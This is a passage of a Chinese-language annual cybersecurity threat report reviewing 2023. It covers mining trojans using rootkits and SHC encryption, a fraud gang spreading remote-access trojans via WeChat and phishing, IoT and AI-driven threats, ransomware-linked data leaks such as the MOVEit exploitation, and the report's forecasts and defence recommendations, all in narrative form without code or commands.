挖矿木马使用内核级工具与SHC加密提升隐蔽性和检测难度 3.2.2.1 内核级工具使挖矿木马更加难以检测 2023年,安天CERT监测到多款挖矿木马使用Rootkit内核级工具,如yayaya Miner[23]、TeamTNT[24]和"8220"[25]等。Rootkit内核级工具之所以受到青睐,主要是因为它们能够在系统的最底层进行潜伏,从而提供更深层次的隐蔽性和控制力。这些工具能够直达操作系统的核心,加载恶意的内核模块,以实现无法被传统安全软件检测到的状态。它们可以有效地隐藏恶意进程和文件,由于这些工具对系统的高级控制,即便是系统重启,它们也能够持续在后台运行,确保持续的挖矿活动不受干扰。随着挖矿木马攻击者对利润的不断追求,结合Rootkit技术的挖矿木马将变得越来越复杂。它们不仅仅满足于利用受害者的计算资源,更可能进行更为深入的网络渗透,对网内其他终端造成潜在威胁。 3.2.2.2 SHC加密脚本促使挖矿木马更加隐蔽 2023年,安天CERT对监测到的挖矿木马进行了梳理,发现挖矿木马攻击者为了逃避安全检测,开始采用各种混淆和加密技术来隐藏其恶意代码。其中,使用Shell脚本编译器(SHC)对脚本进行加密的做法愈发流行,SHC成为了攻击者新的工具选择,以增强其挖矿脚本的隐蔽性。SHC是一种将Shell脚本加密成二进制可执行文件的工具,它可以有效地隐藏脚本的源代码,从而使得分析人员难以直接查看代码内容。这种加密不仅可以防止脚本源代码被分析,还可以绕过基于签名的检测机制,因为每次加密后生成的二进制文件都具有不同的签名。安天CERT在2023年先后分析了Hoze[26]、yayaya Miner和Diicot[27]等挖矿木马,均利用SHC加密的脚本发起初始攻击,这种攻击方式为挖矿木马的传播提供了便利,增加了用户系统被感染的风险。 3.2.3 利用远控木马实施诈骗的黑产威胁活动频繁 2023年,来自黑产团伙的威胁呈现出手段不断变化和资源快速更换等特点。以2023年最活跃的黑产团伙“游蛇”为例,其针对我国国内用户进行的网络钓鱼攻击和诈骗活动,规模较大且持续时间较长,对企业造成了一定的经济损失。这类黑产团伙传播的恶意程序变种多、免杀更新速度快、基础设施更换频繁、攻击目标涉及行业领域广泛。从攻击手段看,以“白加黑”加载恶意载荷、内存执行Shellcode、内存解密载荷文件为主,并且最终投放远控木马载荷。安天CERT将具有上述特点的黑产团伙统称为“游蛇”。 3.2.3.1 通过多种途径传播恶意文件投放远控木马 “游蛇”黑产团伙通过即时通讯软件、搜索引擎恶意推广、钓鱼邮件等多种途径传播恶意文件。在利用微信、企业微信等即时通讯软件传播恶意程序的场景下,攻击者会向目标用户投递伪装成文档的恶意文件,并利用话术诱导用户执行;在利用搜索引擎传播恶意程序的场景下,黑产团伙将恶意文件伪装成各种常用软件的安装包,在搜索引擎中恶意推广其搭建的钓鱼下载站,导致用户误下载和执行经过伪装的恶意文件;在利用钓鱼邮件传播恶意文件的场景下,黑产团伙会向攻击目标发送“发票”、“传票”相关主题及内容的钓鱼邮件,在邮件正文中添加指向仿冒票据服务、税务机关的钓鱼网站链接,并在仿冒的钓鱼网站中放置恶意文件。 相较于后两种传播途径,使用即时通讯软件传播恶意文件时需要更多的人力及时间成本,因此黑产团伙通过“代理人”在境外社交软件中创建群组,以按单结算的方式招收大量“投毒手”,传授其各类钓鱼话术,再由“投毒手”通过网推、网聊、地推等方式对多种行业领域的攻击目标分发恶意文件,并诱导目标用户执行。黑产团伙构建以自身为上游、以“代理人”为中游、以“投毒手”为下游的三级结构,实现了恶意文件的大范围传播,由此形成了一种通过即时通讯软件投放远控木马的运营模式[28]。 3.2.3.2 采用开源远控木马并频繁更新免杀手段 黑产团伙频繁更新免杀手段,与安全产品进行持续性的对抗,常使用的手段有“白加黑”加载恶意载荷、内存执行Shellcode、内存解密载荷等,并重点对恶意利用的白程序、加解密方式及关键的加密载荷进行更换。为了绕过安全产品的常规检测,黑产团伙通常会将编写好的Shellcode保存至文本文件中,通过其投放的加载器读取文本中的内容,在内存中执行Shellcode,利用Shellcode进行多层的解密操作,最终在内存中加载执行远控木马载荷。这种攻击方式增加了远控木马执行的隐蔽性,使安全产品不断面临新的挑战。 在远控木马方面,黑产团伙直接选用成熟的开源远控木马代码进行二次开发,目前已发现的有Gh0st远控木马及其变种、winos、AsyncRAT、DCRAT、SiMayRAT等。这些远控木马由受控端和控制端两部分组成,被植入受害主机中的受控端会收集主机中的各类信息,包括系统基本信息、窗口信息、安全产品信息等,以此构造上线包发送至C2服务器,从而与控制端建立通信,并通常采用自定义算法对通信内容进行加解密。此外,这些远控木马能够接收远程控制指令并执行相应的功能,通常支持以下载执行插件的形式扩展其功能模块。攻击者能够通过控制端程序查看受控端上线信息、对受控端屏幕进行监控、对受控端进行系统文件管理以及对受控端进行远程控制。 3.2.3.3 利用远程控制即时通讯软件和伪装身份对目标用户实施诈骗 在2023年的攻击活动中,黑产团伙将社工手段与诈骗套路相结合,在植入远控木马后,黑产团伙主要控制受害者主机中的微信、企业微信等即时通讯软件开展后续的攻击活动。黑产团伙根据行业、身份、职位等因素对受害者进行筛选及分类,并针对不同类别的目标用户群体采取不同的后续攻击方式[29]。 由于黑产团伙的主要目的在于牟取经济利益,因此从事金融相关行业的人员以及各公司的财务人员是黑产团伙的重点攻击目标。针对此类目标群体,黑产团伙主要通过远控木马对受害主机进行远程控制,根据受害者微信通讯录中的备注信息,将某领导的真实微信号删除,再添加一个与该领导相同头像、名称的伪装微信号,并利用该伪装微信号逐步诱导受害者进行转账,以此完成诈骗活动。攻击者也会利用其中的聊天记录获取有关受害者及其相关联系人的更多信息,从而更加真实地伪装成某一身份。 针对电商客服、企业客服以及其他各类店铺的联系人,黑产团伙主要将受害者微信或企业微信号添加进事先创建好的群组中,将其好友添加至该群组中后移除受害者账号。由于此类人员添加的好友大多是其客户,因此黑产团伙会对其创建的群组进行相应的伪装,并对群组中的用户实施集中诈骗。黑产团伙会在群组中通过发送红包或者小额反利等方式降低用户的戒备心,进一步诱导用户加入大群或添加所谓接待员的微信,以此进行层层筛选,并诱导最终筛选出的目标进行转账。 3.3 脆弱性的泛化趋势 在2013年,安天用恶意代码泛化(Malware/Other)一词表示安全威胁向智能设备、物联网等新领域的演进,此后“泛化”一直是安天研究的重要威胁趋势。泛化意味着攻击者的攻击目标不再局限于手机、电脑等传统智能设备,智能家居、工业物联网、关键基础设施等智能技术加持的新领域也都是攻击者积极利用的目标。 《物联网新型基础设施标准体系建设指南(2023版)》(征求意见稿)[37] 指出,到2025年,物联网新型基础设施标准体系基本建立。新制定国家标准和行业标准30项以上、参与制定国际标准10项以上,为推动物联网发展提供有力支持。国家也出台多项政策鼓励应用物联网技术来促进生产生活和社会管理方式向智能化、精细化、网络化方向转变。 但物联网高速发展的背后也隐含着不可小觑的安全风险。与2022年相比,全球范围内针对物联网设备的恶意软件攻击呈现高速增长的趋势,其中制造业尤为突出,这主要是因为制造业严重依赖于物联网与OT系统。IT与OT的进一步融合,在提升系统运营效率的同时,也带来了漏洞管理难度加大、供应链安全风险上升及攻击面扩大等一系列严峻的安全问题。 此外,物联网设备持有量逐年递增,整合了IoT技术的摄像头、无线AP在各类组织、企业中随处可见。但由于管理和使用上的缺陷,比如未更改初始密码、默认开启telnet远程登录功能、向互联网开放管理权限、部署后缺乏漏洞管理、没有或者无法及时更新补丁等问题,使得攻击者能够利用此类设备构建物联网僵尸网络,从而发起DDoS攻击或进行其他恶意活动。例如,2023年11月,InfectedSlurs僵尸网络利用两个具有远程代码执行功能的漏洞感染使用默认凭据的路由器与录像机。相比于传统的僵尸网络,物联网僵尸网络能够形成最高可达1-2Tbps的流量峰值,且在设备规模上比传统僵尸网络更加庞大。 人工智能技术的快速发展为社会带来了正面影响,但同时也要警惕人工智能驱动的网络犯罪威胁也在不断增加。人工智能具有学习和优化能力,这意味着它可以从大量数据中分析出个体的特征、偏好和行为模式,从而有针对性地实施社会工程学攻击,并从每次攻击结果中学习,不断优化攻击策略,提高了欺骗受害者的可能性。基于深度伪造技术,人工智能也可以创建高度逼真的个人音频和视频,通过伪造他人身份散播谣言、损害声誉,甚至是进行犯罪活动。例如,2023年8月,攻击者通过深度伪造技术冒充软件开发公司Retool的员工,以自身账户出现问题为由诱骗受害者提供多重身份验证(MFA)代码,并最终导致该公司27名客户的账户信息泄露。 在日益加剧的全球威胁背景下,关键基础设施也面临着来自多方面的网络攻击威胁,成为网络攻击重点目标。在网络战中,攻击者通过对此类设施发起攻击,造成电力、网络、医疗等系统的大规模瘫痪,严重影响了社会的正常运转。例如,2023年12月,意大利云服务提供商Westpole遭受Lockbit3.0勒索软件攻击,造成了多达540个城市的1300多个公共管理部门服务瘫痪,一些城市被迫恢复人工操作以提供服务。此外,关键基础设施的数字化转型也增加了其遭受攻击的风险。许多组织在防御纵深构建、暴露面管理、远程访问管理、主机系统安全、漏洞响应以及员工安全意识等高优先级领域存在防范短板,可以被攻击者利用。攻击者还普遍通过,渗透攻击上游软硬件供应链的方式,提前获得攻击优势。总之,从其中一环渗透至关键系统中,给整个系统带来了安全隐患。防御投入的不足、防御能力的低下、防御面存在敞口,防御不能覆盖全生命周期等,等都为攻击者提供了可乘之机。在复杂多变的国际局势下,我国关键基础设施面临的风险严峻升级,需要做好迎接风高浪急甚至惊涛骇浪的准备。 当前,安全威胁泛化已经成为常态。安天依然采用与前几年年报中发布“网络安全威胁泛化与分布”一样的方式,以一张新的图表来说明2023年威胁泛化的形势。 3.4 网络安全风险全面转化为数据和业务风险 现今数据已经是组织的重要资产之一。大量的数据存储,给人工智能提供了生长环境,AI让全球看到了海量数据由量变产生质变的憧憬画面,数据资产的价值得到空前提高。然而有光明的一面就有阴影,一些组织存储的高价值的数据资产成为了攻击者的目标,勒索攻击伴随着数据泄露的风险,利用高危漏洞引发的数据泄露造成的影响也不容小觑,政治因素引发的数据泄露甚至能影响国际形势。 3.4.1 数据泄露损失创历史新高 在万物互联的数字化时代,数字经济已经快速崛起,使得数据已经成为一种重要的资产和战略资源,随之带来的风险也在不断攀升。据相关机构统计,2023年,全球每次数据泄露平均损失达445万美元,创历史新高[30]。数据泄露比较严重的组织已经越来越偏向于关键信息基础设施领域和产业链中上游,其中卫生医疗行业已连续12年成为数据泄露成本的“领先”行业。这些组织存储的数据具有一定“公信力”,存储的数据较完善、真实性较高、数据量较大、数据类型较全,因此这类数据被认为具有很高的价值。据研究显示,83%的泄露事件是出于经济动机[31],而这类具有高价值的数据将会更加受到攻击者觊觎。随着攻击手段的不断更新和漏洞武器化,使得攻击这些存有高价值数据的组织成本变低,因此数据窃取的目标将会愈加趋向选择这些组织。 3.4.2 勒索攻击相关的数据泄露风险 勒索攻击的目标和数据泄露的目标重合度很高,被勒索攻击的目标往往存有高价值的数据,勒索这些组织也往往会获得更高的收益。勒索攻击逐渐形成了通过深入的目标分析和侦察,有选择性地攻击关键的系统、数据或信息,迫使受害者在支付高昂赎金和遭受关键数据泄露的损害之间做出选择。无论是否支付赎金,被窃取的数据处置权都在攻击方手中,仍然会给受害方带来数据泄露的风险。勒索攻击一般是为了经济利益,受害方的高价值数据也为勒索者提供了一项“副业”,因此存在勒索攻击的地方就基本会伴随着数据泄露的风险。 为了逼迫受害方支付赎金,一些勒索组织会预先公布部分泄露的样例文件,威胁或诱导受害方满足其要求,并以此作为与受害方谈判的筹码。中国台湾电脑零部件制造商微星(MSI)被勒索软件团伙Money Message攻击[32],该团伙宣称从微星的企业网络中窃取到了源代码,在其网站中发帖展示CTMS与ERP数据库,以及包含软件源代码、私钥和BIOS固件文件的屏幕截图。威胁微星满足其勒索要求,否则将在五天内公布这些被窃取的文件。最终微星拒绝了其勒索要求,但也因此导致微星、英特尔等公司承受了巨大代价。 3.4.3 漏洞利用依然是窃取数据攻击的主要突防点 2023年备受瞩目的漏洞之一MOVEit漏洞,在MOVEit被发现存在多个高危漏洞后(CVE-2023-34362,CVE-2023-36932,CVE-2023-36933,CVE-2023-36934),一波网络攻击和数据泄露浪潮就开始出现。攻击者利用这些漏洞可以查看、修改、删除数据库,也可以提升用户权限和执行代码。从5月开始MOVEit漏洞就已经被黑客组织利用,根据统计,截至9月份仅勒索组织Cl0p利用MOVEit漏洞攻击的组织数量已超过2000个,受影响的人数超过6000万,MOVEit漏洞的受害者清单正在持续增长,而勒索组织Cl0p也暂时放弃使用勒索软件,转而只窃取敏感数据,并威胁缴纳赎金,否则将其数据泄露出去[33]。截至12月20日,受到攻击的组织已增长到2611个,如图2‑5。 图3‑5 勒索组织Cl0p利用MOVEit漏洞攻击的各国组织数量 受害者虽多在欧美,但同样给国内的网络安全领域敲响了警钟,勒索组织Cl0p已经多次利用高危漏洞窃取数据进行勒索并得逞,需要警惕他们的“示范作用”可能会吸引其他黑客组织的效仿。高价值的数据已经能够使勒索组织暂时放弃勒索软件直接用数据勒索,数据系统被攻击产生的影响不容小觑,数据安全需要各行各业都予以重视,防范措施需要及时、有效。 3.4.4 政治因素引发的数据泄露威胁国家安全、影响国际局势 2023世界地缘政治局势动荡,引起不同阵营的黑客组织或个人的激烈交锋,因此也伴生了大量的数据泄露。如北约军事档案数据泄露事件,泄漏了大量的飞机、导弹、无人机、军舰等军事设施的图纸、技术参数等信息。网络安全公司CloudSEK的人工智能数字风险平台XVigil发现[34],由于印度对以色列的长期支持,多个黑客组织策划了对印度的网络攻击。这些攻击背后的动机主要围绕政治因素,造成的多起数据泄露,严重影响了国家、组织和个人的安全。 涉俄乌冲突的机密文件被泄露更是直接影响了俄乌冲突的走向。泄露的文件涉及俄乌冲突方面的情报,详细描述了乌克兰和俄罗斯军队的部署和状态,尤其是暴露了乌克兰防空系统的潜在漏洞,这对乌克兰计划发起的春季反攻带来了情报威胁。其他文件情报集中在中东以及印度洋与太平洋地区的国防和安全问题上,暴露了美国对韩国、以色列、乌克兰等盟友进行监听的“间谍活动”,这可能将引发新一轮信任危机[35]。此次泄密事件被外媒称为自2013年“棱镜门”事件以来美国最大的泄密事件[36]。 巴以冲突和俄乌冲突中,各国情报机构和黑客组织的深度介入,使其在外围形成了“网络战场”,政治因素引发的数据泄露将会威胁到国家安全,影响地区或国际局势。在复杂多变的国际局势下,我国同样面临着数据安全的挑战,需要做好迎接挑战的准备。 4.2023年威胁趋势总结 回顾2023年重点威胁,高级持续性威胁(APT)活动整体形势依然严峻,定向勒索即服务(RaaS)模式趋于成熟导致勒索攻击愈演愈烈,利益驱动下的挖矿、远控、数据窃密等黑产威胁更加隐蔽化、复杂化以及威胁泛化引发的可攻击面不断扩散和放大。威胁永不眠,具有各种政治、经济、军事意图的攻击行为,对我国网络空间安全治理提出了更具针对性和更深层次的挑战。 ➤攻击者利用认知和防护盲区进行突破。 无论是超高能力国家/地区行为体、高级能力国家/地区行为体、一般能力国家/地区行为体,还是网络恐怖组织、网络犯罪团伙或黑客组织、黑产组织、业余黑客等发起的网络攻击活动都有可能穿透现有防御体系,攻击者借助“假旗”(False Flag)策略,穷尽各类攻击手段(甚至直接招募内鬼),面向组织的人力、财务、运维、客服等与互联网进行高频、深度交互的人员开展线下和线上攻击,采取社会工程学方式并利用人员疏于防范的安全意识,突破组织的安全防线。纵深防御和资源分配不应只是基于拓扑和资产分布的均匀分配,而应形成针对性、有重点的资源投放。 ➤攻击者对漏洞资源的利用效率远胜于防御方。 由于攻击者能熟练使用网络空间测绘引擎的等开源情报,并长期关注积累对重要信息目标的暴露面,因此在POC代码出现后,会有一大批攻击者快速匹配寻找可突防目标。安天CERT把类似攻击称为1Exp攻击。由于RaaS+定向勒索本身又构成了一种“众筹犯罪”模型,导致关注不同目标资源或拥有目标信息资源的大量攻击者,都可能在发现机会窗口时尽可能的将机会窗口转化为实际收益。 ➤安全产品本身极易成为攻击突破口。 由于网络设备和网络安全设备本身是一种容易获取的资源,安全产品本身极易成为被忽略的攻击入口,这些重点威胁明确暴露出这样一个事实:安全产品(设备)或具有一定安全能力的产品(设备)其本身并非是绝对安全的,其整体的设计机理都是将安全能力作用于外部环境对象或者流量对象,并未真正将自身作为可能被攻击者所攻击的目标来强化自身的安全特性。同时,这些产品(设备)在现实应用中,又因其带有安全功能,往往给用户带来了“其自身是安全的”的认知错觉,从而使其更容易成为攻击者的突破点。 ➤基于身份+权限+访问控制的合规体系极易被突破。 统一的身份认证机制、权限管理和访问控制机制是安全合规体系的重要基石。特别是统一身份认证在支撑了安全的情况下,又带来了使用上的便利性。但波音事件攻击者较容易地进行了相关凭证和身份的窃取,之后便利用这些凭证进行攻击和横向移动。由于相关行为不是一般性的探测扫描,而本身就是基于绑定凭证的定向植入与投放,导致攻击过程中波音方面完全无感。这说明在没有有效的、细粒度的感知和敏捷闭环运营能力支撑下,身份权限机制一旦被突破,就反过来成为了攻击者的掩护,从而使攻击者在整个合规体系中畅行无阻。 ➤混合执行体攻击越来越普遍。 不同层次的攻击者不断借鉴和改进其技战术策略,除了使用商业工具、自研工具以及开源工具外,也逐渐将合法工具纳入其武器库,在一些类似的定向勒索或APT级定向攻击中,基于攻击装备清单的梳理,往往同样有很大比例不再是传统意义上的恶意代码,而是为正常的网络管理应用目的所编写的工具或脚本,其中不乏知名的开源工具和商业产品,这些开源工具和商用产品往往都带有发布厂商的数字签名。这种组合运用多种来源执行体的攻击,安天CERT称之为混合执行体攻击。这就使攻击从早期的基于免杀的方式对主机的突防,进一步走入到可以击破反病毒引擎+可信验证的双安全系统的混合执行体攻击。防范这种攻击,简单结合反病毒引擎+可信验证,显然是颗粒度不足的。 ➤主机安全防护依然没有得到有效的强化。 攻击者采用各种方式穿透边界防御措施并建立持久访问,本质上必须依赖在主机侧投递、加载、运行载荷并最终达成致效,在波音遭受勒索事件中波音公司的防御体系几乎无感,表明其主机侧安全产品和运营能力极为不足,而这一问题在国内更为严重:在数字化发展背景下,对“安全的基石回归主机系统侧”这一必然趋势认识不足,对主机侧的安全需求依然理解为合规性的主机杀毒软件或防护软件,并更倾向以低廉的价格而非更有效的能力去选择产品。同时,由于主机侧工作更复杂、细腻,牵扯与信息化和使用部门的关系更多,导致防御者不愿意在主机侧投入主要的安全成本和管理资源,这些都会导致最后一道安全防线越来越难以抵抗定向攻击。 5.2024年威胁的展望 ➤RaaS+定向攻击会更加致命且高发:RaaS模式不仅仅是提供技术基础设施,而是结合宣传炒作、曝光窃取数据、拍卖窃取数据、将受害人举报到监管机构等方式对受害人实施压力,并制造新闻热点,提升品牌效应,从而以滚雪球方式让勒索组织形成臭名昭著的品牌效应。定向勒索模式针对高价值目标,RaaS的附属成员通过各种方式,包括购买0Day漏洞、研发高级恶意代码、收买企业内鬼和情报等手段提高突防能力,提升勒索载荷落地成功率。这种定向+RaaS的“组合拳”模式,形成“定向勒索+窃密+曝光+售卖”链条作业,胁迫受害者支付赎金从而实现获利。 ➤警惕毁瘫痪基础设施的攻击伪装成勒索攻击。勒索攻击成功的直接后果是单位系统和业务的瘫痪和中断,这和信息战手段的致瘫达成了完全一致的效果。因此将毁瘫系统的攻击活动伪装成勒索攻击必然会是不断出现的事件。这种攻击方式在历史上已经被证明,目前可证实的最早出现的此类事件是2017年乌克兰遭遇的NotPetya攻击,当时攻击者将乌克兰系统数据加密瘫痪,并且弹出伪装成勒索软件Petya的攻击信息,而实际上其加密是不可恢复的。RaaS设施的出现,大大降低了毁瘫攻击的成本,形成了非常高效的数据损毁与破坏的“战斗部”,因此不管是这种代表极端势力的非国家行为体,包括一些国家地区行为体,都有可能借助RaaS设施展开攻击,这种攻击活动会加剧社会混乱,同时也会容易导致防御方误判相关攻击的性质。 ➤攻击者普遍采用反测绘技术规避探测。当前APT攻击活动跟踪的一个比较重要的情报来源是网络空间测绘,该技术手段可以迅速发现攻击者已经启用或正在搭建准备启用的C2服务器,然而随着对抗的升级和攻击者规避检测的追求,未来攻击者可能将采用多种伪造或拦截等技术手段规避测绘扫描,这可能将会大大降低APT情报获取的数量。 ➤生成式人工智能技术推动鱼叉式钓鱼攻击效率。目前大型语言模型(LLM)的人工智能技术在网络犯罪领域存在较大的滥用空间,如通过学习目标相关的信息资料生成逼真的鱼叉式钓鱼诱骗信件、诱饵文件内容、钓鱼网站页面等,以及辅助自定义恶意功能的多语言编码和免杀测试,挖掘利用软件漏洞,模拟身份与目标开展语音文字等社工交互,都将大大提高攻击者的攻击运营效率。 ➤挖矿木马影响继续下降。近些年我国对非法挖矿活动的打击已经取得了显著成效,挖矿木马事件有所下降,但挖矿活动依旧存在,挖矿木马数量没有减少。新部署的存在弱口令和漏洞的设备依然为挖矿木马提供生存空间。 ➤黑产团伙将会尝试更多途径传播远控木马。当前黑产团伙正通过招募招收大量“代理人”的方式,帮助他们通过即时通讯软件、搜索引擎恶意推广、钓鱼邮件等多种途径传播恶意程序,并且在控制受害者设备后利用社交软件等方式进一步扩大感染范围。在高额利益的驱使下,未来黑产团伙可能将不断尝试新的途径传播远控木马。 ➤大规模数据泄露事件形成常态,全球网民经被黑产全员画像。虽然2023年存在许多历史泄漏数据拼凑出售的虚假信息,但2024年真实的数据泄露事件仍会频繁发生。数据泄露事件原因多样,除了勒索攻击事件、弱口令和高危漏洞入侵可以窃取数据外,还可能通过内部人员、第三方供应商人员窃密,使得安全治理任重道远。 6.防御和治理思考 6.1 深入关注攻击活动的运营方式和社会规律有助于重新理解防御 研究网络攻击活动不能脱离地缘政治安全要素,不能脱离经济社会土壤,要深入关注各种攻击活动的动机和运行方式。以勒索攻击为例,从犯罪获利的角度来看,获得了高额的勒索赎金对应着犯罪团伙能承担更高的犯罪成本,包括购买0-Day漏洞、研发高级恶意代码、收买企业内鬼和情报等。从另一个角度来看,攻击者制造了“如果不缴纳赎金,受害人将承受远比赎金更高的综合损失”的困境。 网络安全对抗与防护已经是一种经济运行机制的对决。从防御侧来看,从预算投入方面,我们通常将网络安全在信息化的占比作为一个衡量标准,这使网络安全长期处在从属、配套和被压制状态。网络安全风险后果是否才应该是安全投入的第一衡量标准,也需要我们来思考。 这从对立面让我们思考网络安全投入与对标究竟应该以什么为衡量标准?我们认为从规划预算角度,网络安全必须是一套有独立评价参照系的独立预算口径,而不是简单设定为信息化的组成部分。网络安全投入合理的衡量标准是其运行资产价值和出现安全事件的风险损失,而并非信息化投入。通过在信息化中有限占比的方式来规划网络安全投入的传统思路已经成为安全能力建设的障碍。其逻辑错误在于错误定义了网络安全的保障对象——因为网络安全能力保障的并不是IT固定资产投入价值,而是业务和数据资产价值。对于高度依赖于信息系统运行的关基设施和政企机构,网络安全保障的是机构的全量价值,对应机构是一个企业,该价值就是企业的业务价值和营收价值,基于这个价值来判断网络安全投入的合理性,才是真正目标化的衡量标准,而不是仅与信息化投入关联所构建的成本化衡量标准。对于中央管理企业和关键基础设施部门,则还需要进一步评价对应的安全风险从企业自身风险连锁扩大到国家安全、社会治理安全和相关公民个人风险的情况。透过LockBit赎金规则,我们看到需要警惕的是:网络攻击者比网络防御者,先行一步认识到了这一规律。 6.2 正确的认知威胁是有效改善防御能力的基础 当前,针对关键信息基础设施和重要网络信息系统的网空威胁攻击活动,已经不再是一般性的技术事件和技术风险,而是带有复杂的国际安全形势和地缘安全竞合背景、具有情报作业或者网络战性质的行为活动。我们需要穿透“网站篡改”、“数据泄露”、“勒索瘫痪”、“钓鱼邮件”等攻击手法和现象,基于科学方法和工程的方式来认知威胁,才能更好地支撑威胁分析工作,并进一步推动防护能力的改善。传统的防护手段仅是建立起网络防御体系的基本工作,对于防范一般性的网络攻击是有效的,但对于防护超高能力网空威胁行为体则是完全不足的。关键信息基础设施防御体系建设必须对标能够防御高能力对手攻击,建立“体系化的防御”才能应对“体系化的攻击”,才能经受得住攻击者和窥视者的“多重检验”。 另外,对勒索攻击的防范,往往还停留在原有的勒索软件的阶段,还有许多人没有意识到勒索攻击已经是由持续定向入侵、窃取数据、加密数据瘫痪系统、勒索金钱、挖掘数据关联价值二次利用、贩卖数据、向监管机构举报、公开窃取数据所构成的一条价值侵害链,而且已经形成了一个规模极为庞大的犯罪产业。在这样的背景下,遭遇勒索攻击的风险已经不是简单的以数据损失和业务暂停为后果的形态,而是要付出失窃的所有数据均会被贩卖、公开等一系列的连锁风险。 从定向勒索攻击的作业方式来看,其在加密毁瘫行为触发前,是类似APT攻击的高度定制化的作业过程。攻击者或者是专业的攻击作业团队,有坚定的攻击意志、较高的攻击能力、充分的可利用漏洞资源,能掌握大量可利用的脆弱性情报和攻击入口资源,有的可能直接就是内部的攻击者。这也是依托RaaS的定向勒索攻击行动,面对有较强IT运营能力和防护投入的大型机构时仍能屡屡得手的原因。 同时,复杂系统的可靠性保障本身不能依赖于每个节点都不出问题,相对于现代信息系统的规模,特别是面对高级威胁行为体的作业能力,单点失效是必然发生的。需要以体系化防御对决体系化的进攻是一个最基本的认识,防御无银弹。无论在勒索防护中扮演最后一道防线的主机系统防护,还是作为最后应对手段的备份恢复,都是防御体系中的单点环节,都在应对高水平定向攻击中担负着在本身能力范围内检测阻断攻击、降低攻击成功率、提高攻击成本、降低风险损失的局部作用,都无法以单点来对抗体系性的攻击。 我们必须严肃的指出:将定向勒索攻击简单的等同于早期非定向扩散或广泛投放的勒索软件的威胁,将对抗勒索攻击简单看成是加密毁瘫vs.备份恢复的单点对抗,是极为落后、片面的安全认知。如果没有一套完整的防护体系和运营机制,而是认为依靠数据备份恢复来应对勒索攻击。就如同只出场一名守门员,来对抗对方一支球队。 6.3 客观的敌情想定是做好网络安全防御工作的前提 近年来,我国网络安全整体防护水平有了长足进步,但面对高等级网空威胁行为体的有效布防能力依然严重不足,其中原因之一,就是在于对超高能力威胁行为体的能力体系、作业意图、装备与支撑体系认知不足,分析推演不够系统深入。对攻击行为施加于关联场景以及潜在风险后果等重要因素,缺少极限推演。进而导致建设方向偏差、建设思路滞后。 网络安全防护工作,不是一厢情愿的自我臆想与闭门规划实施,而是必须正视威胁、直面对手,将对手和威胁的要素叠加在防御体系上的系统而严谨的工作,是一场关乎国家前途命运和人民福祉的伟大斗争。要充分认识到网络安全所面临敌情的高度严峻性,要立足于大国博弈与地缘安全斗争的大背景,深入贯彻总体国家安全观。把敌情想定构建作为网络安全规划的重要步骤,把“敌已在内”作为基础的想定,针对性地分析对抗场景与条件因素,综合研判目标价值、威胁行为体行动与后果之间的相互作用关系,深入洞悉对手意图目的,真正以高能力网空威胁行为体的组织建制、支撑体系、攻击装备、作业手段、作业体系与行动特点为客观依据,叠加到具体的防御场景上推演分析,完善对网络安全防御工作的规律认知,形成以有效防护为导向的能力建设与实战检验标准。要始终坚持客观敌情想定是网络安全工作的前提,不怯于认知敌情工作的长期性、持续性与艰巨复杂性,不被网空敌情的低可见性所迷惑,不被陈旧的认知与错误的观念所误导,坚持战略上藐视对手,战术上重视对手,将网络安全防御工作建立在正确的敌情想定基础之上,真正打造动态综合有效的网络安全防御能力。 从定向勒索攻击造成后果损失来看,我们必须改变对安全风险与价值的认知范式。由于定向勒索攻击已经形成了窃取数据、瘫痪系统和业务、贩卖数据和曝光数据的组合作业。其最大风险不只是系统和业务瘫痪无法恢复,而是同时面临被攻击企业的用户信息、关键数据、文档、资料、代码等核心资产被倒卖,被公开的风险,从而带来更大的连锁反应。从国内外安全领域长期以来的现实情况来看,很多政企机构改善自身安全的动力,并不来自于提升防护水平的能动性,很多企事业单位认为最可能发生的安全风险,不是遭遇攻击,而是因达不到合规标准,会遭到处罚。因此,安全防护领域构成了一套“投入-合规-免责”的低限建设运行逻辑。而定向勒索攻击所带来的后果,让IT决策者必须判断极限风险,并通过极限风险损失来判断网络安全的工作价值,如何避免业务长时间中断、数据彻底无法恢复、被窃取的数据资产被竞争对手购买,或因曝光严重贬值等极限情况,都是IT决策者和每一个机构必须应对的风险。 针对此类定向攻击的防护必然不是以单点进行突围,必须从整体防护上出发,坚持关口前移,向前部署,构成纵深,闭环运营。最终通过防护体系以达成感知、干扰、阻断和呈现定向攻击方杀伤链的实战运行效果。 通过以定向勒索攻击为代表的案例,可以看到除了合规要求和既有存量之外,分析网络安全投入的关联要素还需要考虑:业务和数据资产的全局价值;攻击可能造成的最大风险损失;遭遇攻击者的可能性以及攻击者能力所能承担的攻击成本,以上因素是安全投入合理性的有效衡量标准。单纯依靠政企机构本身,往往只能知己、不能知敌人,难以完成高质量的评估,因此需要公共产品进行赋能。 6.4 高质量的技术分析是重要的战略支撑能力 深入系统的威胁分析能力,一直是国内网络安全业界的一个能力长板。在长期的威胁分析斗争过程中(包括上世纪80年代后期的病毒样本分析、本世纪初开始的重大蠕虫事件分析和2010年前后系列APT事件分析),中国网络安全业界输出了大量高质量的分析成果,推动了技术创新、产品开发和持续运营,也有效支撑了相关公共安全领域决策,积累了一大批具有较高分析水平的工程师队伍;从产业层面来看,能进行有效威胁分析的安全企业越来越多。 但需要关注的是:1、在过去几年,高质量的分析成果有减少的趋势。在分析工作中,相对急功近利地追逐先发漏洞、热点事件,但不愿意长时间、大成本投入地持续跟踪深度威胁的情况比较普遍;2、规模型网络安全企业也将分析能力的保持和提升视为一种高昂的企业人力成本,而不愿意进行分析团队的扩建和体系性完善;3、在用户单位和管理部门中,也有一部分人存在着“分析报告就是企业软广”的偏颇认识,而忽视了这种分析工作对于准确判定威胁、溯源威胁行为体、研判防御的重点方向等方面具有极为重要的作用。 需要警惕的是,这些负反馈的作用下,分析能力作为我国产业长板能力会持续退化。 6.5 重新构建主机系统安全层面防御基石 主机系统是业务和资产数据价值的承载者,也是攻击者攻击的最终目标。主机端防护能力的历史颇为悠久,从上世纪80年代中后期就已经开始普及终端杀毒软件,但今天我们在实际的分析、取证、复盘中,发现主机端安全反而成为了其中最薄弱的环节之一。在资产价值向云中主机(工作负载)不断迁移、泛在介入的背景下,防火墙等传统安全环节的价值被急剧弱化,加密流量的广泛使用进一步削弱了流量侧安全能力的可见性,这些因素都迫使安全的支撑基石必须重新回到主机系统侧,确保安全边界构建在每一台主机系统之上,并再将这些细粒度安全边界组织成为防御体系。 